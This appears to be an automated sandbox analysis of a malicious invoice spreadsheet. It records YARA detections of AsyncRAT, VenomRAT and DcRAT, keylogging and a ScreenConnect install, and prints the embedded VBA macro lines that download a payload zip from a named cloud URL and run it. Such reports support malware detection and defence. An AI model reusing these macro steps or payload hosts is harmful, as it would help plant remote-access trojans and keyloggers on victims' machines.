                            Source: svchost.exe, 0000000D.00000003.1399934041.00000149EBA31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.v
                            Source: svchost.exe, 0000000D.00000003.1399894906.00000149EBA41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                            Source: svchost.exe, 0000000D.00000003.1399854104.00000149EBA4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                            Source: svchost.exe, 0000000D.00000003.1399854104.00000149EBA4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                            Source: svchost.exe, 0000000D.00000002.1401427871.00000149EBA2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                            Source: svchost.exe, 0000000D.00000003.1399934041.00000149EBA31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvsXG
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                            Source: svchost.exe, 0000000D.00000002.1401762798.00000149EBA59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                            Source: vbaProject.binString found in binary or memory: https://tursiian.com/7z.txt
                            Source: vbaProject.binString found in binary or memory: https://tursiian.com/7z.txt$
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                            Source: unknownHTTPS traffic detected: 149.137.136.16:443 -> 192.168.2.9:49693 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.9:49705 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49874 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.9:49875 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.9:49876 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49879 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49880 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 5140, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 7468, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 7724, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7548, type: MEMORYSTR
                            Contains functionality to log keystrokes (.Net Source)
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout
                            Source: svchost.exe, 00000010.00000003.6134213228.000002CA01290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: F_WinAPI_RegisterRawInputDevices.au3Smemstr_f197c4c9-b

                            Spam, unwanted Advertisements and Ransom Demands

                            barindex
                            Reads the Security eventlog
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                            Reads the System eventlog
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                            Source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: screenshotOCR: Enable Editing Required 11 12 13 Please click 'Enable Editing' to allow the Invoice Viewer to 14 fun
                            Document contains an embedded VBA macro with suspicious strings
                            Source: Document25.xlsmOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
                            Source: Document25.xlsmOLE, VBA macro line: Open Environ("TEMP") & "\invoice_log.txt" For Append As #fileNum
                            Source: Document25.xlsmOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
                            Source: Document25.xlsmOLE, VBA macro line: currentPath = shell.Environment("PROCESS")("PATH")
                            Source: Document25.xlsmOLE, VBA macro line: shell.Environment("PROCESS")("PATH") = folder & ";" & currentPath
                            Source: Document25.xlsmOLE, VBA macro line: temp = Environ("TEMP") & "\invoice_temp\"
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function ExecuteFile, String wscript: Set shell = CreateObject("WScript.Shell")Name: ExecuteFile
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function LogMessage, String environ: Open Environ("TEMP") & "\invoice_log.txt" For Append As # fileNumName: LogMessage
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function AddToPath, String wscript: Set shell = CreateObject("WScript.Shell")Name: AddToPath
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function AddToPath, String environ: currentPath = shell.Environment("PROCESS")("PATH")Name: AddToPath
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function AddToPath, String environ: shell.Environment("PROCESS")("PATH") = folder & ";" & currentPathName: AddToPath
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function ViewInvoiceOnline, String environ: temp = Environ("TEMP") & "\invoice_temp\"Name: ViewInvoiceOnline
                            Document contains an embedded VBA with functions possibly related to ADO stream file operations
                            Source: Document25.xlsmStream path 'VBA/Module2' : found possibly 'ADODB.Stream' functions open, read, write
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function WriteBinaryFile, API ADODB.Stream.Open("C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.zip")Name: WriteBinaryFile
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function DownloadFile, API IServerXMLHTTPRequest2.Open("GET","https://f005.backblazeb2.com/file/newuploavir/newpoveno.zip",False)Name: DownloadFile
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function LogMessage, API ADODB.Stream.Open("C:\Users\user\AppData\Local\Temp\invoice_log.txt")Name: LogMessage
                            Document contains an embedded VBA with functions possibly related to HTTP operations
                            Source: Document25.xlsmStream path 'VBA/Module2' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function DownloadFile, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, sendName: DownloadFile
                            Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function DownloadTextFile, found possibly 'XMLHttpRequest' functions response, responsetext, status, open, sendName: DownloadTextFile
                            Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                            Source: Document25.xlsmStream path 'VBA/Module2' : found possibly 'WScript.Shell' functions currentdirectory, environment, exec, run, environ
                            Office process queries suspicious COM object (likely to drop second stage)
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXECOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess Stats: CPU usage > 49%
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_02EA32C8 NtProtectVirtualMemory,12_2_02EA32C8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 12_2_02EA2E72 NtProtectVirtualMemory,12_2_02EA2E72
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_018132D0 NtProtectVirtualMemory,24_2_018132D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_01813397 NtProtectVirtualMemory,24_2_01813397
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_01812E7A NtProtectVirtualMemory,24_2_01812E7A
                            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3dc3b4.msi
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{A577F2E1-87E7-64F9-23B7-A2399481AED6}
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC5D7.tmp
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC5F8.tmp
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICABB.tmp
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3dc3b6.msi
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3dc3b6.msi
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{A577F2E1-87E7-64F9-23B7-A2399481AED6}
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{A577F2E1-87E7-64F9-23B7-A2399481AED6}\DefaultIcon
                            Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{A577F2E1-87E7-64F9-23B7-A2399481AED6}.SchedServiceConfig.rmi
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\25wldwds.tmp
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\25wldwds.newcfg
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\w3d3pmb2.tmp
